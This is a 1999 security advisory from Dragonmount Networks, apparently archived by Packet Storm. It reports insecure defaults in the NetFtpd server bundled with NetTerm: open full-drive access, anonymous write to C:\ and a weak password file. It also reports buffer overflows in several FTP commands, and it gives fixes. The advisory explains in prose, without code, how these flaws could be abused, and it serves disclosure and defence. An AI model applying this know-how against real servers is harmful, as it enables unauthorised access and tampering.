Dragonmount Networks Advisory 1999-001 [DNA-1999-001] Intersoft's NetFTP daemon (included with NetTerm) has many insecure options enabled by default, including allowing access to the entire hard drive to everybody. There are also numerous buffer overflow problems, resulting in remote Denial of Service and possible remote execution of code.
c7223629b77020242320afda43d02929<!DOCTYPE HTML PUBLIC "html.dtd">
<HTML>
<HEAD>
<META CONTENT="text/html; charset=windows-1252" HTTP-EQUIV="Content-Type">
<META NAME="GENERATOR" CONTENT="Microsoft FrontPage 4.0">
<META NAME="ProgId" CONTENT="FrontPage.Editor.Document">
<TITLE>DNA</TITLE>
<LINK TYPE="text/css" REL="stylesheet" HREF="http://www.dragonmount.net/styles.css">
<META NAME="Microsoft Border" CONTENT="tb, default"></HEAD>
<BODY><!-- msnavigation--><TABLE WIDTH="100%" CELLSPACING="0" BORDER="0" CELLPADDING="0"><TR><TD>
<SCRIPT LANGUAGE="javascript">
function NavRollOver(oTd)
{
if (navigator.userAgent.indexOf("MSIE") != -1)
if (!oTd.contains(event.fromElement)){oTd.bgColor="EBEBEB";}
}
function NavRollOut(oTd)
{
if (navigator.userAgent.indexOf("MSIE") != -1)
if (!oTd.contains(event.toElement)){oTd.bgColor="FFFFFF";}
}
</SCRIPT>
<TABLE WIDTH="100%" BGCOLOR="#E0E0E0" HEIGHT="20" CELLSPACING="1" BORDER="0">
<TR>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/index.html" CLASS="topnav-link">Home</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/about.htm" CLASS="topnav-link">About</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/news.htm" CLASS="topnav-link">News</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/software/index.htm" CLASS="topnav-link">Software</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/tradewars/index.htm" CLASS="topnav-link">Tradewars</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/contact.htm" CLASS="topnav-link">Contact</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/privacy_usage.html" CLASS="topnav-link">Privacy</A></TD>
<TD WIDTH="75" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.dragonmount.net/projects/" CLASS="topnav-link">Projects</A></TD>
<TD WIDTH="95" BGCOLOR="#FFFFFF" ONMOUSEOVER="NavRollOver(this);" ALIGN="center" ONMOUSEOUT="NavRollOut(this);"><A HREF="http://www.winsource.org/" CLASS="topnav-link">WinSource.org</A></TD>
<TD BGCOLOR="#E0E0E0" ALIGN="right"><A HREF="javascript:history.go(-1)"><IMG SRC="http://www.dragonmount.net/images/back.gif" WIDTH="13" HEIGHT="13" BORDER="0"></A></TD>
</TR>
</TABLE>
<TABLE HEIGHT="16" CELLSPACING="0" BORDER="0" CELLPADDING="0">
<TR>
<TD ROWSPAN="2"><MAP NAME="FPMap0">
<AREA SHAPE="rect" COORDS="7, 3, 163, 87" HREF="http://www.dragonmount.net/"></MAP><IMG SRC="http://www.dragonmount.net/images/left.jpg" WIDTH="288" HEIGHT="145" USEMAP="http://www.dragonmount.net/security/dna/dna-1999-001.htm#FPMap0" BORDER="0"></TD>
<TD VALIGN="top" HEIGHT="36"><IMG SRC="http://www.dragonmount.net/images/right.jpg" WIDTH="258" HEIGHT="36" BORDER="0"></TD>
</TR>
<TR>
<TD VALIGN="top"><!-- - The Datacom Ad Network [http://www.datais.com] --->
<CENTER>
<IFRAME WIDTH="468" MARGINHEIGHT="0" SRC="http://ads.datais.com/ads/ad.cgi?Falcon-ad1&lmth=iframe&chnc=true" FRAMEBORDER="no" HEIGHT="60" SCROLLING="no" MARGINWIDTH="0" BORDER="0">
<A HREF="http://ads.datais.com/ads/ad.cgi?Falcon-link1&chnc=true" TARGET="_top"><IMG ALT="Click here to visit our sponsor" SRC="http://ads.datais.com/ads/ad.cgi?Falcon-ad1&chnc=true" BORDER="0"></A><BR>
<A HREF="http://www.datais.com/">The Datacom Ad Network</A><BR>
</IFRAME>
</CENTER>
<!-- ----------------------------------------------------></TD>
</TR>
</TABLE>
<BR>
</TD></TR><!-- msnavigation--></TABLE><!-- msnavigation--><TABLE WIDTH="100%" CELLSPACING="0" CELLPADDING="0" BORDER="0"><TR><!-- msnavigation--><TD VALIGN="top">
<TABLE WIDTH="750" CELLSPACING="0" CELLPADDING="0" BORDER="0">
<TR>
<TD WIDTH="130" VALIGN="top" ALIGN="right"><!-- webbot bot="Include" u-include="../nav-sec.htm" tag="BODY" startspan -->
<P><A HREF="http://www.dragonmount.net/security/index.htm" CLASS="sec-navlinkb">Security Home</A></P>
<P><A HREF="http://www.dragonmount.net/security/dna/index.htm" CLASS="sec-navlinkb">Advisories</A>
<!-- webbot bot="Include" endspan i-checksum="26044" -->
<P> </TD>
<TD WIDTH="17" VALIGN="top" ALIGN="center"><IMG WIDTH="1" SRC="http://www.dragonmount.net/images/orangepixel.gif" HEIGHT="100%" BORDER="0"></TD>
<TD VALIGN="top">
<H1 CLASS="sec-H1">DNA-1999-001: NetTerm FTP Daemon</H1>
<H2 CLASS="sec-H2">Vendor:</H2>
<P CLASS="sec-text"><A HREF="http://starbase.neosoft.com/~zkrr01/" CLASS="sec">InterSoft</A></P>
<H2 CLASS="sec-H2">Program:</H2>
<P CLASS="sec-text">NetFtpd distributed with NetTerm 4.2.a/4.2.2/4.2.1,
and possibly previous versions</P>
<H2 CLASS="sec-H2">Platforms:</H2>
<P CLASS="sec-text">All versions of 32-bit windows</P>
<H2 CLASS="sec-H2">Risk:</H2>
<P CLASS="sec-text">High</P>
<H2 CLASS="sec-H2">Problem:</H2>
<P CLASS="sec-text">Many insecure options are enabled by default. A number
of buffer overflows also exist.</P>
<H2 CLASS="sec-H2">Solution:</H2>
<P CLASS="sec-text"><B>Vendor:</B> Don't enable insecure options by
default. Perform length validation on all input to the program.<BR>
<B>User:</B> Immediately cease use of NetFtpd unless you are absolutely
positive that it is configured correctly, your box isn't open to a console
attack, and the only account activated is your own. Disable anonymous
access immediately.</P>
<H2 CLASS="sec-H2">Details</H2>
<P CLASS="sec-text">Users of the program NetFtpd (comes standard with the
newest version of NetTerm 4.2.a, and possibly previous versions) are
vulnerable to myriad security problems. The ones we have concentrated on
deal strictly with the FTP server itself, and not the NetTerm terminal
emulation program.</P>
<P CLASS="sec-text">*NONE OF THIS AFFECTS THE NETTERM CLIENT, ONLY THE FTP
SERVER BUNDLED WITH IT!*</P>
<OL>
<LI>
<P CLASS="sec-text">By default, the FTP server allows access to the
entire hard drive to anybody presenting any user name. There is an
option that says "Accept calls from anyone." This option is
misleading; I took it to mean "Accept connections from
anyone.", not "Let anyone log in." Why would there be
an option to let anyone presenting any userid full access to the hard
drive? By default this is on, and all servers I have seen configured
have left this option turned on. This should not be an option, period.
If it is an option, it should not be the default. Absolutely
ridiculous.</LI>
<LI>
<P CLASS="sec-text">Anonymous access is allowed by default. Sure, many
FTP servers come configured this way. Unfortunately, the default
(without any configuration) read and write drive for user anonymous is
C:\. This means even if you force people to provide a login/password,
allowing anonymous access without changing the directory privileges
gives anyone full access to the hard drive. Also, write privileges do
mean write; overwrite even. Running the FTP server "out of the
box", anyone can upload a new autoexec.bat, etc. Plus, users have
delete privileges by default. There isn't an option to turn off
deleting files, or even writing files for that matter. It is all or
nothing with this program. The default read/write drive for anonymous
should be a directory lower than the root directory. Perhaps
C:\Program Files\NetTerm\FtpRoot would be more appropriate. Secondly,
anonymous access should be turned off by default.</LI>
<LI>
<P CLASS="sec-text">The password scheme is weak. First and foremost,
there is no "administrator" type password. Anyone with
console access can add/delete/and change any user's password. There
should be an admin password required before any of this action can be
taken. The passwords are stored in a file by default called
"password". The form of the file is<BR>
<BR>
user1:encryptedpass<BR>
user2:encryptedpass<BR>
etc..<BR>
<BR>
So, by having access to this file, users don't need to use the program
as front door. They can edit this file by hand,
adding/deleting/changing users passwords. In most cases, users can
upload a new "password" file, overwriting the current
settings. This assumes the directory problems aren't fixed as noted in
[2]. Also, the encryption method is weak and would not take much skill
to break.</LI>
<LI>
<P CLASS="sec-text">Surprise, a closed-source Windows FTP Server has a
buffer overflow. Nothing exciting here. It appears that the USER
command is truncated to 16 characters; no problem there. The PASS
command also seems to stand up to our testing. However, there are
problems with the following when a large string [~1024 chars] is sent
to the server: dir, ls, mkdir, pass [when used for anonymous access],
delete, and rmdir. These all crash the server with an invalid page
fault. From the looks of it, remote code execution is a definite
possibility. You'll notice that PASS has an overflow only when user
anonymous logs in [i.e. where it asks for email address]. This is why
anonymous access should be disallowed immediately if you are to
continue using this product.</LI>
</OL>
<H2 CLASS="sec-H2"><BR>
Conclusion:</H2>
<P CLASS="sec-text">With everything wrong with this program, it is only
our hope that no one person or business will use this for any machine that
they wish to be secure. Hopefully, after these problems have been brought
to InterSoft's attention they will be fixed in a new release. Users should
thoroughly test that anonymous access is disallowed, and that any user
name will not work. When logging in, they should restrict themselves to
certain directories, not the entire C:\. This way if their
username/password is compromised, the entire C:\ will not be open. There
may well be other exploits that work in this manner. If you allow anyone
access, even anonymous, do not let them read the directory the program was
installed in. They will be able to retrieve the password file remotely and
steal all the encrypted passwords, which may yield elevated access.</P>
<P CLASS="sec-text">Release: November 15, 1999</P>
<P CLASS="sec-text">Dragonmount Networks Advisory 1999-001 [DNA-1999-001]<BR>
Erik Iverson<A HREF="mailto:erik@dragonmount.net" CLASS="sec"><BR>
erik@dragonmount.net</A><BR>
<A HREF="http://www.dragonmount.net/" CLASS="sec">http://www.dragonmount.net</A></TD>
</TR>
</TABLE>
<!-- msnavigation--></TD></TR><!-- msnavigation--></TABLE><!-- msnavigation--><TABLE WIDTH="100%" CELLSPACING="0" CELLPADDING="0" BORDER="0"><TR><TD>
<TABLE WIDTH="750" CELLSPACING="0" CELLPADDING="0" BORDER="0">
<TR>
<TD WIDTH="25"></TD>
<TD WIDTH="718">
<P ALIGN="left"><A HREF="http://www.dragonmount.net/security/dna/dna-1999-001.htm#top" CLASS="goto">Top of page</A></P>
<P CLASS="footertext" ALIGN="center">This page was last modified Monday, November 15, 1999<BR>
Copyright 1999 Dragonmount Networks. All rights reserved.<BR>
<A HREF="http://www.dragonmount.net/privacy_usage.html" CLASS="navlink">Privacy and Usage Policy</A>.
Questions or comments? <A HREF="http://www.dragonmount.net/contact.htm" CLASS="navlink">Contact us</A>.<BR>
</TD>
</TR>
</TABLE>
<P>
</TD></TR><!-- msnavigation--></TABLE></BODY>
</HTML>
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!